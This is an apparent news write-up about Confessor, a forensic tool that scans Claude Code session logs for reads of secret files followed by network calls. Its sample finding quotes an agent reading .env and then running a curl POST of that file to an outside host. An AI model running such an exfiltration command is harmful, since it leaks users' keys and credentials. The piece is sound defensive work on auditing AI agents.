Confessor replays Claude Code's JSONL session logs to show every file read, command, and network call — flagging sensitive data followed by exfiltration. Run
npx confessorfor a full HTML report.
Key Takeaways
- Confessor replays Claude Code's JSONL session logs to show every file read, command, and network call — flagging sensitive data followed by exfiltration.
- Run
npx confessorfor a full HTML report.
What Confessor Does
Confessor is a post-hoc forensic tool that answers a question you should be asking: What did Claude Code actually do on my machine?
Claude Code can read any file your user account can — .env, ~/.ssh keys, browser-saved passwords, tax PDFs. It can run shell commands and reach the network. Most of the time it does exactly what you asked. But you don't know that. You know it finished the task.
Confessor reconstructs the agent's entire history from session logs already sitting on your disk — every file opened, every command run, every secret that passed through its context, and everywhere it could have sent data. It flags the specific chain you care about: a sensitive file read, followed by a network call in the same session. Data in, a way out, right after.
How It Works
Claude Code writes every session to ~/.claude/projects/**/*.jsonl — one JSON event per line, including each tool call and its result. Confessor replays them in order, scanning file contents for secrets (API keys, SSH keys, credentials) and cross-referencing with network calls.
From the sample report (generated from planted fake data):
- The agent read
.env— three live keys inside — and fifteen seconds later rancurl -X POST … -d @.envto a host that isn't yours. - This is not proof anything was stolen. It's a lead, and it's exactly the question you can't answer today: did my stuff leave?
What Makes It Different
Existing tools in this space are compliance loggers — you wrap the agent, they stream events to a dashboard, you read audit trails. Confessor is the opposite: nothing to install alongside the agent, nothing running, no daemon. The logs are already on your disk. You run one command, after the fact, and get the forensic picture — including the read-then-exfiltrate chains, which the loggers don't connect for you. And it makes zero network calls itself.
Try It Now
You need Node ≥ 18.17. Then:
npx confessor
With no arguments it finds your local Claude Code logs (~/.claude/projects), reconstructs what the agent did, scans the content, writes confessor-report.html, and opens it.
To include your chat services (ChatGPT, Claude, Gemini), download an export and point at it:
npx confessor --chats ./chat-export
Flags:
-
--json— machine-readable output -
--out <file>— specify output file -
--no-open— don't auto-open the report -
--quiet— minimal console output -
--fail-on critical|high|medium— exits non-zero; drop in CI to fail a build that leaked a secret
When To Run It
-
After every Claude Code session where you worked with sensitive files (
.env, SSH keys, API configs) - Before committing — run it as a pre-commit hook to catch secrets that might have been logged
-
In CI — use
--fail-on criticalto block PRs that leaked secrets into agent logs - Weekly audits — run against all recent sessions to spot anomalous patterns
The Bottom Line
Confessor turns Claude Code's existing session logs into a forensic report that shows you exactly what the agent accessed. It's the closest thing to an audit trail for an AI coding agent that doesn't require running alongside the agent itself. If you're using Claude Code with any sensitive data, run this tool. The logs are already there.
Source: github.com
Originally published on gentic.news


Top comments (0)